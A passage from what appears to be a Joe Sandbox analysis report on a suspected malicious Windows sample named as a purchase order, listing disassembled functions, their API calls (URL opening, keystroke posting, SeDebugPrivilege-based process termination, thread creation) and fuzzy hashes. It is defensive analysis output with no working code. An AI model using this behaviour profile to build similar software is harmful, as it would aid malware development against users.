                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                • String ID:
                                • API String ID: 1268354404-0
                                • Opcode ID: b809d38f7904bdd02e0fd44cc2a41862e0ffb10893d197b789fa7a246a38eeea
                                • Instruction ID: 23563d28ac4f9157639af88e1291395521a0c3b3e5e40ad5a8840b47bc7470ee
                                • Opcode Fuzzy Hash: b809d38f7904bdd02e0fd44cc2a41862e0ffb10893d197b789fa7a246a38eeea
                                • Instruction Fuzzy Hash: 0F5178B4600309EFDB24CF64CC95FAA7BB5FB58750F144618F9129B2A0DB70E9A1DB50
                                Function 001CC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001CC182
                                • GetLastError.KERNEL32 ref: 001CC195
                                • SetEvent.KERNEL32(?), ref: 001CC1A9
                                  • Part of subcall function 001CC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001CC272
                                  • Part of subcall function 001CC253: GetLastError.KERNEL32 ref: 001CC322
                                  • Part of subcall function 001CC253: SetEvent.KERNEL32(?), ref: 001CC336
                                  • Part of subcall function 001CC253: InternetCloseHandle.WININET(00000000), ref: 001CC341
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                • String ID:
                                • API String ID: 337547030-0
                                • Opcode ID: d8deb1957c58f06fecd4321a1dbf19ffd959cb8d525f61751e650bf6b2231cdc
                                • Instruction ID: 25cae97be8119d56c23748b4a9aa0add55b2472566ab07a1cd5b4c9dbfc4242b
                                • Opcode Fuzzy Hash: d8deb1957c58f06fecd4321a1dbf19ffd959cb8d525f61751e650bf6b2231cdc
                                • Instruction Fuzzy Hash: BC317A71600645AFDB219FE5DC44F6ABBF9FF28300B04441DF95A86A10D730EC559BE0
                                Function 001B25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B3A57
                                  • Part of subcall function 001B3A3D: GetCurrentThreadId.KERNEL32 ref: 001B3A5E
                                  • Part of subcall function 001B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001B25B3), ref: 001B3A65
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001B25BD
                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001B25DB
                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001B25DF
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001B25E9
                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001B2601
                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001B2605
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001B260F
                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001B2623
                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001B2627
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                • String ID:
                                • API String ID: 2014098862-0
                                • Opcode ID: c65987e5c2d811c1baad515b5560ecf26abb241ecc88b76545e4857b9323a341
                                • Instruction ID: b43eff342e9c73de3b9872ca5f6e660d22253134738b3947eeb015e9637f06dc
                                • Opcode Fuzzy Hash: c65987e5c2d811c1baad515b5560ecf26abb241ecc88b76545e4857b9323a341
                                • Instruction Fuzzy Hash: BA01D830390250BBFB1067A99CCAFD93F59DB5EB12F100011F314AF1D1CAF114858AA9
                                Function 001B1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001B1449,?,?,00000000), ref: 001B180C
                                • HeapAlloc.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B1813
                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001B1449,?,?,00000000), ref: 001B1828
                                • GetCurrentProcess.KERNEL32(?,00000000,?,001B1449,?,?,00000000), ref: 001B1830
                                • DuplicateHandle.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B1833
                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001B1449,?,?,00000000), ref: 001B1843
                                • GetCurrentProcess.KERNEL32(001B1449,00000000,?,001B1449,?,?,00000000), ref: 001B184B
                                • DuplicateHandle.KERNEL32(00000000,?,001B1449,?,?,00000000), ref: 001B184E
                                • CreateThread.KERNEL32(00000000,00000000,001B1874,00000000,00000000,00000000), ref: 001B1868
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                • String ID:
                                • API String ID: 1957940570-0
                                • Opcode ID: 77764c59e3e4698007a99c9d2c179cb6a73aba88014122f389d4bd1131be896f
                                • Instruction ID: 5aaefe370039c895dcac839bfbf80743a51b81909f3c5b68d74561d24ab566c4
                                • Opcode Fuzzy Hash: 77764c59e3e4698007a99c9d2c179cb6a73aba88014122f389d4bd1131be896f
                                • Instruction Fuzzy Hash: D301BBB5240348FFE710ABA5DC8DF6B3BACEB89B11F414411FA05DF5A1CA709841CB60
                                Function 001DA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001BD501
                                  • Part of subcall function 001BD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001BD50F
                                  • Part of subcall function 001BD4DC: CloseHandle.KERNEL32(00000000), ref: 001BD5DC
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA16D
                                • GetLastError.KERNEL32 ref: 001DA180
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001DA1B3
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 001DA268
                                • GetLastError.KERNEL32(00000000), ref: 001DA273
                                • CloseHandle.KERNEL32(00000000), ref: 001DA2C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                • String ID: SeDebugPrivilege
                                • API String ID: 2533919879-2896544425
                                • Opcode ID: 1d85f2412a1624c35d63f182410d6e6fb2cad18fdb0bf258e654341f79e88175
                                • Instruction ID: ec99e688dc56277af0985ba8bf64f683c6444608c4532f39bcc007c735729e7f
                                • Opcode Fuzzy Hash: 1d85f2412a1624c35d63f182410d6e6fb2cad18fdb0bf258e654341f79e88175
                                • Instruction Fuzzy Hash: E6618C312042429FD714DF19C894F1ABBE1AF54318F58849DE8668FBA2C772ED49CBD2
                                Function 001E3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001E3925
                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001E393A
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001E3954
                                • _wcslen.LIBCMT ref: 001E3999
                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 001E39C6
                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001E39F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$Window_wcslen
                                • String ID: SysListView32
                                • API String ID: 2147712094-78025650
                                • Opcode ID: a135c13ea51f2964d0751807dc5f4ca7809efabed0c4a4e2975d80a924fa7936
                                • Instruction ID: 9db0d4df2c00c80341ee16081c51dc1334948c9655e67df7deb285624b15314b
                                • Opcode Fuzzy Hash: a135c13ea51f2964d0751807dc5f4ca7809efabed0c4a4e2975d80a924fa7936
                                • Instruction Fuzzy Hash: 1241E371A00658ABEF219FA5CC49FEE7BA9EF18354F100126F958E7281D3719E90CB90
                                Function 001BBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001BBCFD
                                • IsMenu.USER32(00000000), ref: 001BBD1D
                                • CreatePopupMenu.USER32 ref: 001BBD53
                                • GetMenuItemCount.USER32(00E16D80), ref: 001BBDA4
                                • InsertMenuItemW.USER32(00E16D80,?,00000001,00000030), ref: 001BBDCC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                • String ID: 0$2
                                • API String ID: 93392585-3793063076
                                • Opcode ID: 52128056aaac85130923b9c62f084c4e0da1d7efccbd9cc5b6b8c93d01afd0c2
                                • Instruction ID: bb0bc936a68165adbb68e0296196e86f49f71d1afac3797594fbcbf068e24f87
                                • Opcode Fuzzy Hash: 52128056aaac85130923b9c62f084c4e0da1d7efccbd9cc5b6b8c93d01afd0c2
                                • Instruction Fuzzy Hash: CB51BC70A082059BDF20DFE8C8C4BEEBBF4AF55318F148219E4119B690D7B89941CB61
                                Function 001BC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadIconW.USER32(00000000,00007F03), ref: 001BC913
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID: blank$info$question$stop$warning
                                • API String ID: 2457776203-404129466
                                • Opcode ID: 2c514eccabfc15adf1696b9e52baa5edfa602c58915372d3cc96f08d92bc6db4
                                • Instruction ID: f98782c61d5c66b75660f51c44c93885ee7c5e7323db40f275ea99c727471dd4
                                • Opcode Fuzzy Hash: 2c514eccabfc15adf1696b9e52baa5edfa602c58915372d3cc96f08d92bc6db4
                                • Instruction Fuzzy Hash: 85112732689307BBB7049B549C83CEE67ECDF66328B20402EF504E61C2E7A05E4152E4
                                Function 001BED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$LocalTime
                                • String ID:
                                • API String ID: 952045576-0
                                • Opcode ID: bfab4b97eef427081d69d092a41d3d82759b8c6cce71aa5053466bf0277e0a68
                                • Instruction ID: 19010e2562ae34a959a41287c8e3916f8784c6c51ea4b9a37a15ce89ceb5bf6a
                                • Opcode Fuzzy Hash: bfab4b97eef427081d69d092a41d3d82759b8c6cce71aa5053466bf0277e0a68
                                • Instruction Fuzzy Hash: 8F41B065D1021876CB11EBF48C8A9CFB7B8AF59310F50C566E618E3122FB34E245C3A6
                                Function 0016F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 0016F953
                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 001AF3D1
                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 001AF454
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 7a16cacc49351f64e96d44e49f461ab8a1d69b1c8b16faf67282470e9b96f0fa
                                • Instruction ID: e94ceb3c56ffcf0ba9b214efb9f8b4485fb1dc5b55187ef507d9665cf6d71f23
                                • Opcode Fuzzy Hash: 7a16cacc49351f64e96d44e49f461ab8a1d69b1c8b16faf67282470e9b96f0fa
                                • Instruction Fuzzy Hash: 4A410935608780BAD73D8B69AC8872A7BA2AF5631CF15443CF09756661C731A8D3C751
                                Function 001E2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 001E2D1B
                                • GetDC.USER32(00000000), ref: 001E2D23
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001E2D2E
                                • ReleaseDC.USER32(00000000,00000000), ref: 001E2D3A
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001E2D76
                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001E2D87
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001E5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001E2DC2
                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001E2DE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                • String ID:
                                • API String ID: 3864802216-0
                                • Opcode ID: a3777eac07b0b9a47bbecdd9593234ed874a199dd105b77f9ad4691d74c1b790
                                • Instruction ID: afb106ebb2db59178556dfafee4bfa6ac45bd29c4be9e90473ad9daad599c3e4
                                • Opcode Fuzzy Hash: a3777eac07b0b9a47bbecdd9593234ed874a199dd105b77f9ad4691d74c1b790
                                • Instruction Fuzzy Hash: C4318B72201694BBEB118F958C8AFEB3BADFB49721F044055FE089E291C6759C81CBA0
                                Function 001B5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: c8b9c143c3571e2200eac6c3bafb2ce8a2e75001a987776ff9b8f08d8493fb09
                                • Instruction ID: 682f8180fb140e0e32a4be302102a355d1615436a367aa8c72d12408b50f7651
                                • Opcode Fuzzy Hash: c8b9c143c3571e2200eac6c3bafb2ce8a2e75001a987776ff9b8f08d8493fb09
                                • Instruction Fuzzy Hash: C5219571B40E0977E31857259D82FFE336FAF34398F644024FD099A581FB60EE1182A5
                                Function 001D4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: NULL Pointer assignment$Not an Object type
                                • API String ID: 0-572801152
                                • Opcode ID: eb21c907d6a28a0119f7de790b24e32e4020adac705a96a2a1b0fedc788823ab
                                • Instruction ID: 3560b28db44aeef5e7eabe52e4c8c202c8b89c5d13e623014a1a6dceb9ec4828
                                • Opcode Fuzzy Hash: eb21c907d6a28a0119f7de790b24e32e4020adac705a96a2a1b0fedc788823ab
                                • Instruction Fuzzy Hash: B0D1A375A0060AAFDF14CF98C881FAEB7B6BF58344F14816AE915AB381D770DD45CB90
                                Function 00191522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001917FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001915CE
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00191651
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001917FB,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001916E4
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001916FB
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00191777
                                • __freea.LIBCMT ref: 001917A2
                                • __freea.LIBCMT ref: 001917AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                • String ID:
                                • API String ID: 2829977744-0
                                • Opcode ID: 5049ad808e388f8e04065e17c1c95628c894ec8347da765511675c85cfeac180
                                • Instruction ID: 810b5fdb06090c8d00c7f64b38a95847b10edb0fcfd4a2fd07fd7a2f8f47280d
                                • Opcode Fuzzy Hash: 5049ad808e388f8e04065e17c1c95628c894ec8347da765511675c85cfeac180
                                • Instruction Fuzzy Hash: 6691C672E00217BAEF258EB4CC81AEE7BB5AF5A710F1A4659E901E7141D735DDC0CBA0
                                Function 001D4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInit
                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                • API String ID: 2610073882-625585964
                                • Opcode ID: fc887380e31372e9ac7bbd29d5c675f276c391ff8b9fcc03de8532a23090864f
                                • Instruction ID: 57a0338dcf22794d1dad4bf5452eefe52044abafc1237a82b094850b477e9130
                                • Opcode Fuzzy Hash: fc887380e31372e9ac7bbd29d5c675f276c391ff8b9fcc03de8532a23090864f
                                • Instruction Fuzzy Hash: D8919E71A00219ABDF24CFA5DC88FEEBBB8EF56714F10855AF515AB280D7709941CFA0
                                Function 001C1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                Download Yara Rule
                                APIs
                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 001C125C
                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 001C1284
                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001C12A8
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C12D8
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C135F
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C13C4
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C1430
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
